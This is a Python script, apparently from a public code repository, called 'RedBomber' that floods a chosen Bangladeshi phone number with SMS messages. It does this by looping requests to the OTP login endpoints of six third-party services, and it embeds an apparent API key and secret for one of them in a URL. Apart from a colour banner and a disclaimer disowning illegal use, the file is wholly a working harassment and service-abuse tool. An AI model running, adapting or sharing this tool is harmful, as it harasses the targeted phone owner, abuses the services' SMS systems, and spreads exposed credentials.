-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathredbombbd.py
144 lines (77 loc) · 4.19 KB
/
redbombbd.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
import requests
from requests.structures import CaseInsensitiveDict
import os
import sys
import time
os.system("pip install requests")
os.system("clear")
red="\033[0;31m" # Red
yellow="\033[0;33m" # Yellow
green="\033[0;32m" # Green
color_off="\033[0m" # Text Reset
bblack="\033[1;30m" # Black
bred="\033[1;31m" # Red
ured="\033[4;31m" # Red
on_green="\033[42m" # Green
blue="\033[0;34m" # Blue
lightblue = '\033[94m'
red = '\033[91m'
white = '\33[97m'
yellow = '\33[93m'
green = '\033[1;32m'
cyan = "\033[96m"
end = '\033[0m'
purple="\033[0;35m"
logo=(green+"""
██████╗░███████╗██████╗░██████╗░░█████╗░███╗░░░███╗██████╗░███████╗██████╗░
██╔══██╗██╔════╝██╔══██╗██╔══██╗██╔══██╗████╗░████║██╔══██╗██╔════╝██╔══██╗
██████╔╝█████╗░░██║░░██║██████╦╝██║░░██║██╔████╔██║██████╦╝█████╗░░██████╔╝
██╔══██╗██╔══╝░░██║░░██║██╔══██╗██║░░██║██║╚██╔╝██║██╔══██╗██╔══╝░░██╔══██╗
██║░░██║███████╗██████╔╝██████╦╝╚█████╔╝██║░╚═╝░██║██████╦╝███████╗██║░░██║
╚═╝░░╚═╝╚══════╝╚═════╝░╚═════╝░░╚════╝░╚═╝░░░░░╚═╝╚═════╝░╚══════╝╚═╝░░╚═╝ """)
line=(yellow+"======================================================")
tversion=(cyan+"\t\t Version : 1.0.1 ")
line2=("\t\t~~~~~~~~~~~~~~~~~~~~~~~~~~")
dtls=(yellow+"\t\t Created By: Redwiat ")
note=(cyan+"Note: I wont be responsible fo any illigal activites. >> This RedBomber tool is for use in Bangladesh only. Use our Global version for worldwide use.")
print(logo)
print(" ")
print(dtls)
print(tversion)
print(line)
print(note)
print(line)
print(' ')
number=str(input(red+"[➙] Enter Your Number : "))
amount=int(input(cyan+"[➙] Enter The Amount : "))
url1 = "https://ss.binge.buzz/otp/send/login"
headers1 = CaseInsensitiveDict()
headers1["Content-Type"] = "application/x-www-form-urlencoded"
data1 = "phone="+number
url2 = "https://api.daktarbhai.com/api/v2/otp/generate?=&api_key=BUFWICFGGNILMSLIYUVH&api_secret=WZENOMMJPOKHYOMJSPOGZNAGMPAEZDMLNVXGMTVE&mobile=%2B88"+number+"&platform=app&activity=login"
headers2 = CaseInsensitiveDict()
headers2["Content-Type"] = "application/json"
headers2["Content-Length"] = "0"
url3 = "https://stage.bioscopelive.com/en/login/send-otp?phone=88"+number+"&operator=bd-otp"
url4 = "https://xrides.shohoz.com/api/v2/user/send-mobile-verification-code"
headers4 = CaseInsensitiveDict()
headers4["Content-Type"] = "application/json"
data4 = '{\"mobile\":\"'+number+'\"}'
url5 = "https://addabaji.mobi/twocups-v1-robi/otp.php"
headers5 = CaseInsensitiveDict()
headers5["Content-Type"] = "application/x-www-form-urlencoded"
data5 = "msisdn="+number
url6 = "https://developer.quizgiri.xyz/api/v2.0/send-otp"
headers6 = CaseInsensitiveDict()
headers6["Content-Type"] = "application/json"
data6 = '{"phone":"'+number+'","country_code":"+880","fcm_token":null}'
for i in range (amount):
resp1 = requests.post(url1, headers=headers1, data=data1)
resp2 = requests.post(url2, headers=headers2)
resp3 = requests.get(url3)
resp4 = requests.post(url4, headers=headers4,data=data4)
resp5 = requests.post(url5, headers=headers5, data=data5)
resp = requests.post(url6, headers=headers6, data=data6)
print(str(i+1)+green+'. ➙SMS Sent 😈✅')
print(' ')
print(cyan+'\t\tThanks For Using RedBomber Bangladesh By Redwiat - RedHunter Team')